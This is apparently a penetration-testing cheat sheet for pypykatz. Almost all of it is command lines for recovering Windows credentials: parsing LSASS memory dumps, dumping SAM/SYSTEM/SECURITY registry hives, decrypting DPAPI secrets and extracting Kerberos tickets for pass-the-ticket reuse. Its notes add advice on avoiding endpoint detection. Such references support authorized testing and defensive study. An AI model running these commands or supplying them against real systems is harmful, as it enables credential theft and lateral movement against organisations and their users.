← All cheat sheets

PYPYKATZ

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

pypykatz is a pure-Python implementation of mimikatz. Its main strength
is parsing credentials OFFLINE from LSASS dumps, registry hives, and
other artifacts on any OS (no Windows needed). Ideal for analysing dumps
pulled during an engagement. Authorized use only.

LSASS DUMP PARSING#

pypykatz lsa minidump lsass.dmp                # Parse an LSASS minidump
pypykatz lsa minidump lsass.dmp -o creds.txt   # Save output
pypykatz lsa minidump lsass.dmp --json         # JSON output
pypykatz lsa minidump lsass.dmp -g             # Grep-friendly
pypykatz lsa minidump *.dmp                     # Multiple dumps
# Recovers: NTLM hashes, cleartext (wdigest), Kerberos tickets, DPAPI keys

REGISTRY HIVE PARSING (OFFLINE SECRETS)#

pypykatz registry --sam sam.hiv --system system.hiv
pypykatz registry --security security.hiv --system system.hiv
pypykatz registry ./system.hiv --sam ./sam.hiv --security ./security.hiv
# Extract local account hashes, LSA secrets, cached domain creds
# (hives grabbed via: reg save HKLM\SAM / SYSTEM / SECURITY)

LIVE (ON A WINDOWS HOST)#

pypykatz live lsa                                # Parse live LSASS (admin)
pypykatz live registry                           # Live registry secrets
pypykatz live dpapi                               # Live DPAPI

DPAPI DECRYPTION#

pypykatz dpapi ...                                # DPAPI blob decryption
# Decrypt credential blobs, browser secrets, vaults once you have the
# masterkey (from LSASS dump or domain backup key)

KERBEROS TICKETS#

pypykatz lsa minidump lsass.dmp -k ./tickets     # Extract .kirbi tickets
# Recovered TGT/TGS can be reused (pass-the-ticket) via Rubeus/impacket

REMOTE (VIA SMB)#

pypykatz smb ...                                  # Some builds support
# remote operations; NetExec/lsassy are the usual at-scale route

EXAMPLES#

# Parse a dump created remotely (e.g. via lsassy --dumppath / procdump)
pypykatz lsa minidump lsass.dmp -g

# Offline local-hash + LSA-secret recovery from saved hives
reg save HKLM\SAM sam.hiv && reg save HKLM\SYSTEM system.hiv \
  && reg save HKLM\SECURITY security.hiv
pypykatz registry --sam sam.hiv --security security.hiv --system system.hiv

# Extract Kerberos tickets from a dump for pass-the-ticket reuse
pypykatz lsa minidump lsass.dmp -k ./tickets

NOTES#

- pypykatz shines OFFLINE: get the dump/hives out safely, parse on your
  own Linux box - no mimikatz.exe on the target, less host-side risk
- Pairs with LSASSY (remote dump creation) and MIMIKATZ (on-host live)
- Dumping LSASS on the target is the detectable step; parsing with
  pypykatz afterward is invisible to the target's EDR
- Works cleanly on your NixOS box (pure Python) - no Windows tooling
- Handling recovered cleartext/hashes must follow the engagement's
  data-handling rules for FS clients (store encrypted, destroy on close)